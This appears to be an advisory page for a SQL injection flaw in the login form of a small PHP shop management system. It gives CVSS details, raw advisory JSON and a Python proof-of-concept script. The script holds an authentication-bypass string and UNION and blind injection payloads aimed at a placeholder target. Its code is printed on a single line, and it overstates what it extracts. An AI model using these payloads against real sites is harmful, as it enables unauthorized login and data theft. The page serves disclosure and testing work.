Security Vulnerability Report
中文
CVE-2025-69563 CVSS 9.8 CRITICAL

CVE-2025-69563

Published: 2026-01-27 17:16:10
Last Modified: 2026-02-03 14:01:32

Description

code-projects Mobile Shop Management System 1.0 is vulnerable to SQL Injection in /ExLogin.php via the Password parameter.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fabian:mobile_shop_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Mobile Shop Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69563 SQL Injection PoC # Target: Mobile Shop Management System 1.0 # Location: /ExLogin.php Password Parameter import requests import sys target_url = "http://target.com/ExLogin.php" # Basic authentication bypass payload payload_bypass = "admin' OR '1'='1" # Union-based injection payload to extract database info payload_union = "' UNION SELECT NULL,NULL,NULL,NULL,version(),user(),database(),NULL-- -" # Boolean-based blind injection to extract admin password payload_blind = "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)='1" def test_sqli(payload, param='Password'): data = { 'username': 'admin', param: payload } try: response = requests.post(target_url, data=data, timeout=10) # Check for successful login indicators if 'dashboard' in response.text.lower() or response.status_code == 302: return True return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("[*] CVE-2025-69563 SQL Injection Test") print(f"[*] Target: {target_url}") print("\n[1] Testing authentication bypass...") if test_sqli(payload_bypass): print("[+] Authentication bypass successful!") else: print("[-] Authentication bypass failed") print("\n[2] Testing union-based injection...") if test_sqli(payload_union): print("[+] Union injection successful - database info extracted") print("\n[*] PoC completed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69563", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:09.970", "lastModified": "2026-02-03T14:01:32.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "code-projects Mobile Shop Management System 1.0 is vulnerable to SQL Injection in /ExLogin.php via the Password parameter."}, {"lang": "es", "value": "code-projects Mobile Shop Management System 1.0 es vulnerable a inyección SQL en /ExLogin.php a través del parámetro Password."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:mobile_shop_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "958D1268-CF0E-40EF-A202-4E11EED70E06"}]}]}], "references": [{"url": "https://gist.github.com/lih28984-commits/544eaaca3ea58563a807c43b521d76e6", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gitee.com/Z_180yc/zyy/issues/IDC3IB", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}